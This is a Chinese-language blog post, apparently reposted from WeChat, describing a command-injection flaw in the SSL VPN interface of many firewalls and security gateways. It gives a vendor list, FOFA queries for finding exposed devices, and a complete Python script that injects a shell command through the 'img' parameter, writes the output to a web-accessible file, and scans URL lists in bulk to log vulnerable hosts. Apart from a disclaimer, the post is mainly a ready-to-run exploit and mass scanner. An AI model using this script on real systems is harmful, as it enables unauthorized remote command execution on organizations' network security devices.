安全设备命令执行漏洞
漏洞描述
部分安全设备存在命令执行漏洞,攻击者可通过接口进行命令拼接从而达到命令执行漏洞,获取服务区权限。
漏洞影响
H3C-下一代防火墙
安全信息-明御安全网关
MAIPU-安全网关
D-Link-下一代防火墙
HUAWEI-产品
迈普通信技术股份有限公司安全网关
博达通信-下一代防火墙
任天行网络安全管理系统/安全审计系统
安博通应用网关
烽火网络安全审计
瑞斯康达科技发展股份有限公司安全路由器
任子行网络安全审计系统
绿盟安全审计系统
深圳市鑫塔科技有限公司第二代防火墙
海康威视安全网关
优炫防火墙
SG-8000深度安全网关
网御星云上网行为管理系统
360上网行为审计系统
fofa
app="安恒信息-明御安全网关"
···
title="SG-8000深度安全网关"
漏洞复现
访问网站并抓取数据包
修改数据包
访问ceshi001.txt
漏洞脚本
import requests
import argparse
requests.urllib3.disable_warnings()
def exp(url):
print(f'正在处理的URL: {url}') # 添加的打印语句
try:
res = requests.get(
url + "/sslvpn/sslvpn_client.php?client=logoImg&img=x%20/tmp|echo%20%60whoami%60%20|tee%20/usr/local/webui/sslvpn/ceshi.txt|ls",
verify=False, timeout=10)
shell_url = url + '/sslvpn/ceshi.txt'
if 'x /tmp|echo `whoami` |tee /usr/local/webui/sslvpn/ceshi.txt|ls' in res.text:
print(f'[+]存在漏洞:{shell_url}')
with open('results.txt', 'a') as f:
f.write(f'[+]存在漏洞:{shell_url}n')
except requests.exceptions.Timeout as e:
print(f'[!]连接超时: {e}')
except Exception as e:
print(f'[!]漏洞不存在或发生异常: {e}')
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-l', '--list', help='打开外部的url.txt')
parser.add_argument('-u', '--url', help='指定单个url')
args = parser.parse_args()
if args.list:
with open(args.list, 'r') as f:
resp = f.readlines()
for url in resp:
url = url.strip()
if 'http' not in url:
url = 'http://' + url
exp(url)
elif args.url:
exp(args.url)
else:
print("请使用-l或-u参数")
if __name__ == "__main__":
main()
原文始发于微信公众号(安全小白):安全设备命令执行漏洞——通杀
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论